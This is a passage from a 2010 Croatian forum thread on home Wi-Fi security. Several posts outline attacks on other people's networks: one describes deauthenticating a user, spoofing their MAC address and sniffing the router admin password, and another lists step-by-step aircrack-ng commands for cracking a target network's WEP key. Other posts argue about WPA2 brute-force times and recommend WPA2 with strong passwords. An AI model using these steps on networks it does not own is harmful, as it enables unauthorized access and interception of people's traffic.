Natrag   Forum.hr > Informatička tehnologija > Za napredne korisnike > Linux, UNIX i ostali unixoidi

Linux, UNIX i ostali unixoidi Open source OS-ovi i sve o njima

Odgovor
 
Tematski alati Opcije prikaza
Old 30.05.2010., 03:11   #61
Quote:
lilo kaže: Pogledaj post
*snip*
te kada se neki klijent isključi iz mreže možemo onda fejkati njegovu mac adresu te onda pokušati krekirati WEP zaštitu.
*snip*
Odlično ako je tako. Ja sam spojen 24/7 na svoj wlan, a od "zaštite" imam samo skriven ID mreže, dobar password za administraciju rutera, i custom mac listu gdje imam enablean samo svoj PC. Eventualno jednom mjesečno pregledam logove na ruteru da vidim jel bilo sumnjivih aktivnost.

Znači ovaj setup je zadovoljavajuć. Bar meni osobno.
shadowww is offline  
Odgovori s citatom
Old 30.05.2010., 10:16   #62
Quote:
dalmatino kaže: Pogledaj post
2. Isključite SSID Broadcast na vašem AP-u (AccessPoint-u).
Malo kasno palim, ali dobro je znati: Isključivanje SSID Broadcasta je u slučaju Windows klijenata veći sigurnosni problem od broadcasta:
http://technet.microsoft.com/en-au/l.../bb726942.aspx
Also, ako imate Windows OS i WPA zaštitu, nemojte isključivati SSID Broadcast!
__________________
Luve Powershell, Python & Red Hat Linux...
Forest Gimp is offline  
Odgovori s citatom
Old 30.05.2010., 11:29   #63
Quote:
shadowww kaže: Pogledaj post
Odlično ako je tako. Ja sam spojen 24/7 na svoj wlan, a od "zaštite" imam samo skriven ID mreže, dobar password za administraciju rutera, i custom mac listu gdje imam enablean samo svoj PC. Eventualno jednom mjesečno pregledam logove na ruteru da vidim jel bilo sumnjivih aktivnost.

Znači ovaj setup je zadovoljavajuć. Bar meni osobno.
err - ne.

http://www.aircrack-ng.org/doku.php?id=aireplay-ng

pogledaj pod: Hidden SSIDs "<length: ?>"

Dakle napadač ima opciju ili da te čeka da se spojiš pa da ti pročita SSID ili jednostavno posalje deauth i odspojim te s tvoj APa.

takodjer (isti link, pri dnu):

Quote:
MAC access control lists do not apply to deauthentication.
http://www.aircrack-ng.org/doku.php?id=deauthentication


Dakle plan je: odspojim tebe deauth napadom, fejkam mac u tvoj, spojim se ja Ostaje samo još da probijem pass od rutera da dodam sebe na mac listu i pocnem surfat ležerno na tvoj račun. E sad da bi lakse dosao do passa od tvog rutera mogu pokusat npr ovo:

- nemas enkripcije sto znaci da mogu slobodno u zraku wiresharkom hvatat tvoje pakete i i njihov sadržaj. Recimo da ti gmail i sl. passworde ne mogu lako uhvatit zbog ssl-a, no kad se spajaš na ruter nećeš koristit ssl jer 99% rutera to nema

- da ne bih čekao mjesec dana da se ti spojiš na ruter i tim mi daš pristup passwordu, kad vidim da si online i surfam par puta te uzastopce deauth napadom te natjeram da se logiraš na ruter i pogledas šta to sad opet t-com radi svinjarije

- uhvatim ti pass, čekam da prestaneš surfat, i odradim gore spomenuti deauth, macchange, connect, logiram se u ruter dodam sebe na mac listu i to je to.

Dok ne provjeriš mac listu sve će biti ok.



Uglavnom: WPA2 + MAC lista i to je to ostalo su sve nepotrebne zajebancije i izmisljanja. Danas 99% rutera i klijenata podrzava WPA2, potrosite par minuta i napravite to kako treba (naravno s jakim passwordima, sve pada u vodu ako vam je pass za wireless - "wireless").
lilo is offline  
Odgovori s citatom
Old 30.05.2010., 16:16   #64
Hvala puno lilo na detaljnim informacijama, nisam do sad znao što sve može taj aircrack. Fino je to sve i slažem se s tvojim zaključkom. Iako vjerojatno neću mijenjat svoj setup uskoro jer znam da mi ruter signal ne baca predaleko od kuće, a poznam sve susjede okolo te sam prilično uvjeren da nitko nema sposobnosti napravit opisan postupak provaljivanja.

A možda i glavni drawback kod wpa2 enkripcije mi je veća latencija/generalno sporija konekcija. Bar u mojem slučaju, testirao sam jel, i nije vrijedno benefita u pogledu sigurnosti. Ali neko svatko odluči za sebe, naravno.
shadowww is offline  
Odgovori s citatom
Old 30.05.2010., 16:22   #65
Quote:
shadowww kaže: Pogledaj post
Hvala puno lilo na detaljnim informacijama, nisam do sad znao što sve može taj aircrack. Fino je to sve i slažem se s tvojim zaključkom. Iako vjerojatno neću mijenjat svoj setup uskoro jer znam da mi ruter signal ne baca predaleko od kuće, a poznam sve susjede okolo te sam prilično uvjeren da nitko nema sposobnosti napravit opisan postupak provaljivanja.

A možda i glavni drawback kod wpa2 enkripcije mi je veća latencija/generalno sporija konekcija. Bar u mojem slučaju, testirao sam jel, i nije vrijedno benefita u pogledu sigurnosti. Ali neko svatko odluči za sebe, naravno.
Da ukoliko ti je susjedstvo takvo da su te okružili "penzioneri" a signal se gubi 20 metara od kuće onda nema smisla sad to mijenjat i trpit sporiju konekciju koju si testirao.

No dobro je uvijek razmisljat o sigurnosti vlastite mreže pogotovo kad u novije vrijeme sve više ljudi koristi wireless u kombinacijama s net bankarstvima, emailima, facebook i sl. Dovoljno se zapitat dal bi se doveo u nezgodnu situaciju ako bi mi netko oteo email račun kojeg koristim godinama?
lilo is offline  
Odgovori s citatom
Old 03.06.2010., 16:02   #66
ja mislim da se backtrack ne mora samo nuzno koristit za crackiranje wep zastite...mislim to se moze i jednostavnije za puno manje vremena...tj one naredbe od autora teme su malo pobrkane i idu strasno krivim redosljedom..prvo treba vidit o kojem se interface radi pa onda ga zaustavit pa onda ifconfig down (interface)pa onda macchanger i onda pokretanje i snimanje...to je totalno ne legalno..a i za vasu informaciju...backtrack se koristi na isti nacin i to potpuno istim redosljedom za razbijanje zastite digitalne televizije...zato mislim da je ova tema ajme ne legalna...neznam...a to zastita wpa,wpa2,tkip-psk...to nije nista...sve se to da rijesit..

nije mi jasno zasto je autor zadao airodump-ng stop wlan0-kad airodump nije ni pokrenuo...mislim..rekla kazala
valjda ide prvo airmon-ng,pa kad saznas interface onda ides airmon'ng stop wlan0,pa onda ifconfig wlan0 down,pa onda macchanger --m 11.22.33.44.55 wlan0,i onda airmon-ng start wlan0,i tek onda paljenje airodump'ng wlan0...

sry umjesto ' ide - ja sam sav u backtarcku

Zadnje uređivanje vocnacokolada : 03.06.2010. at 16:14.
vocnacokolada is offline  
Odgovori s citatom
Old 03.06.2010., 21:43   #67
Quote:
vocnacokolada kaže: Pogledaj post
ja mislim da se backtrack ne mora samo nuzno koristit za crackiranje wep zastite...mislim to se moze i jednostavnije za puno manje vremena...tj one naredbe od autora teme su malo pobrkane i idu strasno krivim redosljedom..prvo treba vidit o kojem se interface radi pa onda ga zaustavit pa onda ifconfig down (interface)pa onda macchanger i onda pokretanje i snimanje...to je totalno ne legalno..a i za vasu informaciju...backtrack se koristi na isti nacin i to potpuno istim redosljedom za razbijanje zastite digitalne televizije...zato mislim da je ova tema ajme ne legalna...neznam...a to zastita wpa,wpa2,tkip-psk...to nije nista...sve se to da rijesit..

nije mi jasno zasto je autor zadao airodump-ng stop wlan0-kad airodump nije ni pokrenuo...mislim..rekla kazala
valjda ide prvo airmon-ng,pa kad saznas interface onda ides airmon'ng stop wlan0,pa onda ifconfig wlan0 down,pa onda macchanger --m 11.22.33.44.55 wlan0,i onda airmon-ng start wlan0,i tek onda paljenje airodump'ng wlan0...

sry umjesto ' ide - ja sam sav u backtarcku
A sta cijeli si uso uback track boze boze.a dobro svako ima svoj fetis
ps.pa necemo bas sve tocno napisat ni to to.a sta se tice wpa2 tkip-psk samo cu zakašljat
ajde zivio ti meni .
boozo is offline  
Odgovori s citatom
Old 03.06.2010., 22:27   #68
Ako netko koristi Atheros kartice sa madwifi driverom.
Moja kartica je pod nazivom wifi0 sa nicknameom ath0.

1. Konzola

1. iwconfig - ovom naredbom se dobiva popis uređaja za rad.
2. airmon-ng stop ath0 - zaustavljanje monitor moda.
3. ifconfig wifi0 down
4. macchanger --mac 00:11:22:33:44:55 wifi0 (nemora biti od 0-5).
5. airmon-ng start wifi0 (ponovo monitor mode).
6. airodump-ng start ath0 (sa ovom naredbom vidimo mreze u dometu).

2. Konzola (pracenje data paketa)

1. airodump-ng -c 11 (broj kanala na kojem je router, ocitati iz prve konzole) -w ivan (ime datoteke za spremanje paketa) --bssid (bssid mreze za napad, također se ocitava iz prve konzole) ath0 (ime uređaja koji ja koristim).

3. Konzola

1. airplay-ng -1 0 -a (bssid mreze za napad) -h 00:11:22:33:44:55 (lazna mack adresa) ath0
2. aireplay-ng -3 -b (bssid mreze za napad) -h 00:11:22:33:44:55 ath0

4. Konzola (trazenje wep kljuca)

1. aircrack-ng -b (bssid mreze za napad) ivan-01.cap (ime datoteke za spremanje paketa obavezno dodati -01.cap)
Autor teme je to objasnio malo jace.
Backtrack je sustav za testiranje sigurnosti i vjerojatno najbolji, koji ima i drugacije primjene kao i ostali linux-i, sustav koji dolazi sa vise od 300 programa i aplikacija definitivno nije nesto napravljeno tek tako.............................
Ivan 992 is offline  
Odgovori s citatom
Old 04.06.2010., 20:52   #69
mislim ako ti ne znas razbit wpa2 tkip psk...onda kaslji dok je ne razbijes..al ako radis s backtrackom...vise si nego pola puta...sam fali ti jos malo....faliiiiii...hehheehheeheh

moj bozo...to je sve slozeno tim redosljedom kojim je slozeno eto bas zato da znas to raslozit i ponovo poslozitt...uuu backtrack majstoree...kaslji kaslji...heheheh..joj
vocnacokolada is offline  
Odgovori s citatom
Old 07.06.2010., 11:58   #70
Quote:
vocnacokolada kaže: Pogledaj post
mislim ako ti ne znas razbit wpa2 tkip psk...onda kaslji dok je ne razbijes..al ako radis s backtrackom...vise si nego pola puta...sam fali ti jos malo....faliiiiii...hehheehheeheh

moj bozo...to je sve slozeno tim redosljedom kojim je slozeno eto bas zato da znas to raslozit i ponovo poslozitt...uuu backtrack majstoree...kaslji kaslji...heheheh..joj

Ja se kladim u sta god hoces da ne mozes krekirati moj WPA2 nema sanse, a jos da nije PSK zaboravi. Mozda mozes prosjecnog korisnika jer upotrebljavaju neku jednostavnu rijec ali to se lako da zakomplicirat. Zato te molim da ne pricas gluposti da se WPA moze hackirat samo tako... Za misli da je je jos AES lol....
Jedino tko je nes uspio u tome su neka dva kineza ako se ne varam ali kada su ih pitali da pokazu to pred publikom nisu pristali....

Ako tako lako krekiras WPA onda tebi nije mjesto ovdje vec u nekoj firmi gdje bi ti placa bila po 25 000eur mjesecno....

Pozdrav

Zadnje uređivanje JoZoFX : 07.06.2010. at 12:08.
JoZoFX is offline  
Odgovori s citatom
Old 08.06.2010., 01:25   #71
ma ok..
mislim koliko ti znas kad bubas ovaku glupost...krekirat wpa2 je ma ciji kasalj?...

ne citas...ili neznas upotrjebit...sta ti ja mogu..

http://www.whatsmypass.com/how-to-crack-wpawpa2

strasno..sta rec..

Zadnje uređivanje vocnacokolada : 08.06.2010. at 01:35.
vocnacokolada is offline  
Odgovori s citatom
Old 08.06.2010., 02:12   #72
Quote:
vocnacokolada kaže: Pogledaj post
ma ok..
mislim koliko ti znas kad bubas ovaku glupost...krekirat wpa2 je ma ciji kasalj?...

ne citas...ili neznas upotrjebit...sta ti ja mogu..

http://www.whatsmypass.com/how-to-crack-wpawpa2

strasno..sta rec..
Quote:

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length.
Dakle možemo reći ako imaš loš - dictionary password - WPA/WPA2 se može probit u nekom razumnom vremnu. Ako imaš duži random password - nemoguće ga je probiti u razumnom vremenu.

Sad istina je da su ljudi skloni imat idiotski loše passworde:

datumi rođenja i sl. - koliko god mislili da je nemoguće pogoditi kad ste rođeni "količina" datuma u zadnjih 50ak godina nije zastrašujuće veliki broj

imena - marko, internet, petar - su jako jadni passwordi

samo brojevi posebno tipa: 123 1234 12345

posebna domišljatost: ja ću uzet pass koji glasi password toga se nitko neće sjetit DDD


Bitno je naglasiti ne samo za wireless nego za sve moguće suvremene identifikacije passwordima da ste sigurni koliko vam je password jak. Izaberite random password s velikim i malim slovima i brojevima. Ne zapisujte ga i zapamtite ga To je jedino jamstvo da vam ga netko neće probit
lilo is offline  
Odgovori s citatom
Old 08.06.2010., 10:15   #73
Quote:
vocnacokolada kaže: Pogledaj post
ma ok..
mislim koliko ti znas kad bubas ovaku glupost...krekirat wpa2 je ma ciji kasalj?...

ne citas...ili neznas upotrjebit...sta ti ja mogu..

http://www.whatsmypass.com/how-to-crack-wpawpa2

strasno..sta rec..
Po ovome sta vidim ti ne znas citat... Daj procitaj jos jednom moj post.
Napisao sam da se moze ako je pass slab. ali ti uporno tvrdis da je krekiranje wpa maciji kasalj sto nije istina. Majciji kasalj je da imas rijec do nekoliko slova.
Uglavnom nemam volje vise raspravljat sa tobom i sa likovima toliko ufuranima da sve znaju i da su najbolji....
Uzivaj u svom egu...

Pozdrav
JoZoFX is offline  
Odgovori s citatom
Old 08.06.2010., 15:14   #74
da imas lozinku od 10 znakova frende...sto je vecina takih,,,jerr i kad zoves provajdere da konfigurirate wireless mrezu on ti kaze stavi 10 znakova u lozinku...e sad.......
vocnacokolada is offline  
Odgovori s citatom
Old 08.06.2010., 15:21   #75
Quote:
lilo kaže: Pogledaj post
Dakle možemo reći ako imaš loš - dictionary password - WPA/WPA2 se može probit u nekom razumnom vremnu. Ako imaš duži random password - nemoguće ga je probiti u razumnom vremenu.

Sad istina je da su ljudi skloni imat idiotski loše passworde:

datumi rođenja i sl. - koliko god mislili da je nemoguće pogoditi kad ste rođeni "količina" datuma u zadnjih 50ak godina nije zastrašujuće veliki broj

imena - marko, internet, petar - su jako jadni passwordi

samo brojevi posebno tipa: 123 1234 12345

posebna domišljatost: ja ću uzet pass koji glasi password toga se nitko neće sjetit DDD


Bitno je naglasiti ne samo za wireless nego za sve moguće suvremene identifikacije passwordima da ste sigurni koliko vam je password jak. Izaberite random password s velikim i malim slovima i brojevima. Ne zapisujte ga i zapamtite ga To je jedino jamstvo da vam ga netko neće probit
ma evo decko je shvatio ...je sve ostalo je u vremenu koje ces ostavit da se to skuplja ti podaci...nije to nista tako tesko...imas tamo i tablicu i graficke prikaze na koje nacine se skupljaju znakovi
vocnacokolada is offline  
Odgovori s citatom
Old 08.06.2010., 19:40   #76
Quote:
vocnacokolada kaže: Pogledaj post
da imas lozinku od 10 znakova frende...sto je vecina takih,,,jerr i kad zoves provajdere da konfigurirate wireless mrezu on ti kaze stavi 10 znakova u lozinku...e sad.......
kalkulator: http://lastbit.com/pswcalc.asp

10 znakova, brzina 500k po sekundi:

a) Samo mala slova: Brute Force Attack will take up to 10 years
b) Mala slova i brojevi: Brute Force Attack will take up to 236 years

Tako da tih 10 znakova ne znaci mnogo. Hajdemo zamislit da imamo komp koji racuna 1M znakova u sec (duplo brze) = 5 godina - previše previše... No i ako kazemo da imamo srece pa da cemo naci password kad probamo pola kombinacija - to je opet 2,5 god konstantnog rada računala... Tako da teoretski sve se da probit, ali upotrebljivost i realna šansa da će to netko radit je mizerna.

Primjer sa malim slovima + brojevi necu ni spominjat.
lilo is offline  
Odgovori s citatom
Old 08.06.2010., 20:23   #77
ma ne...ide istim redosljedom ima nacin dumpanja routera iliti aces pointa ...sam lijepo ti pise 500000 data...to znaci sa dual core 3010x2 dva tri dana rada...

ocu rec da ako se netko namjeri da je mreza jbg ne zasticena...nemoze pomoc ni mac filtering zastita koja se gleda kao jedna od naprednijih..

vlasnik sam jedne wireless mreze i sa ljudima iz t-coma razgovarao...imao sam slucaj napada i dumpanja routera al preko dana i bilo je primjetno jer je brzina pala na 0.31mb/s..i covjek dodje i kaze..jbg...

http://www.hsc.fr/ressources/article...n9_wifi_EN.pdf..

ej iz koje je to godine??

Zadnje uređivanje vocnacokolada : 08.06.2010. at 20:50.
vocnacokolada is offline  
Odgovori s citatom
Old 08.06.2010., 21:23   #78
Quote:
As indicated by Robert Moskowitz, the second message of the 4-Way Handshake could be subjected to both dictionary and brute force of- fline attacks.
samo da ostanemo na istoj misli i taj dokument tvrdi isto, problem je dakle taj brute force.

A što se tiče brzine generiranja passworda:

words: 684083 time: 0:00:00:10 w/s: 68000 current: -------

John the Ripper password cracker, version 1.7.0.2

proc: Intel(R) Xeon(R) CPU X3220 @ 2.40GHz (4 jezgre)

E sad pretpostavljam da koristi 1 jezgru i ako bi to jednostavno (no ne mora biti tako...) učetverostručili dobili bi: 272000 w/s dakle skoro duplo manje nego što smo u gornjem primjeru prepostavljali.

Tako da efikasnost brute forcea još nije realna opcija. Moguće da negdje griješim pa ako imaš drugačija saznanja objasni nam
lilo is offline  
Odgovori s citatom
Old 09.06.2010., 02:08   #79
ma nemam..odustajem
vocnacokolada is offline  
Odgovori s citatom
Old 09.06.2010., 21:27   #80
Quote:
vocnacokolada kaže: Pogledaj post
ma nemam..odustajem
napokon :klap:

vec sam mislio da ti znas nesto vise od svih nas

Prije nekoliko mjeseci kada sam testirao na svojoj mrezi bas WPA-PSK napravio sam mali dictionary ali sve moguce kombinacije mislim da je bio sa max 5 ili 6 slova, zauzeo je mislim 2gb a zamisli da imas 7, 8,9 itd....
JoZoFX is offline  
Odgovori s citatom
Odgovor



Kreni na podforum




Sva vremena su GMT +2. Trenutno vrijeme je: 12:40.